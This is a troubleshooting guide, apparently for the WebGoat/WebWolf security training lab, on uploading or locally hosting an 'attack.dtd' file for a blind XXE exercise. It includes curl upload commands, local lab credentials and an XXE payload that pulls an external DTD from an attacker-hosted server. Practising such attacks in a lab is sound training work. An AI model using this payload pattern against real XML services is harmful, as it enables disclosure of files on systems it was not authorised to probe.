====================================================================
WEBWOLF FILE UPLOAD - TROUBLESHOOTING
====================================================================

ERROR: 500 error at /fileupload when trying to upload DTD

SOLUTION: Use the correct WebWolf interface for file uploads

====================================================================
CORRECT METHOD TO UPLOAD DTD TO WEBWOLF:
====================================================================

METHOD 1: Using WebWolf Web Interface
--------------------------------------

1. Open WebWolf in browser:
   http://127.0.0.1:8002/WebWolf
   OR
   http://192.168.254.112:8002/WebWolf

2. Login (if needed):
   Username: nooniman (your WebGoat username)
   Password: nooniman (same as username by default)

3. Look for one of these sections:
   - "File Server" or
   - "Files" or  
   - "File Upload" or
   - Navigation menu item

4. Upload your attack.dtd file

5. After upload, the file should be accessible at:
   http://127.0.0.1:8002/files/nooniman/attack.dtd


METHOD 2: Using curl (PowerShell)
----------------------------------

# Upload using WebWolf's file upload API
$file = "c:\webgoat-scripts-1\attack.dtd"
$url = "http://127.0.0.1:8002/WebWolf/fileupload"

curl.exe -X POST -F "file=@$file" $url


METHOD 3: Manual File Placement (if WebWolf has file system access)
--------------------------------------------------------------------

If WebWolf stores files locally, you might be able to place the file
directly in its directory. Typical locations:

- C:\Users\mahad\.webgoat-2025.3\webwolf\files\nooniman\
- Or similar path based on your WebWolf configuration


METHOD 4: Use PUT request instead
----------------------------------

curl.exe -X PUT `
  --data-binary "@c:\webgoat-scripts-1\attack.dtd" `
  "http://127.0.0.1:8002/files/nooniman/attack.dtd"

====================================================================
ALTERNATIVE: Host DTD on a Simple HTTP Server
====================================================================

If WebWolf file upload keeps failing, you can host the DTD yourself:

PowerShell Simple HTTP Server:
-------------------------------

cd c:\webgoat-scripts-1
python -m http.server 8003

Then change your XXE payload to use:
http://127.0.0.1:8003/attack.dtd

Or use Node.js:
---------------
npm install -g http-server
http-server -p 8003

====================================================================
UPDATED XXE PAYLOAD (if using local server):
====================================================================

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://127.0.0.1:8003/attack.dtd">
  %remote;
]>
<comment>
  <text>Blind XXE Attack</text>
</comment>

====================================================================
WEBWOLF COMMON ISSUES:
====================================================================

Issue: "Not logged in"
Solution: Go to http://127.0.0.1:8002/WebWolf/login
         Username: nooniman
         Password: nooniman

Issue: "File upload returns 500"
Solution: Try different endpoint:
         - /WebWolf/fileupload
         - /fileupload
         - /files/upload
         - Or use WebWolf web interface

Issue: "Can't access WebWolf"
Solution: Make sure WebWolf is running
         Check: http://127.0.0.1:8002/WebWolf

Issue: "Wrong path"
Solution: After upload, file should be at:
         http://127.0.0.1:8002/files/[username]/attack.dtd

====================================================================
TESTING IF DTD IS ACCESSIBLE:
====================================================================

After uploading, test in browser:
http://127.0.0.1:8002/files/nooniman/attack.dtd

You should see your DTD content or it should download.

====================================================================
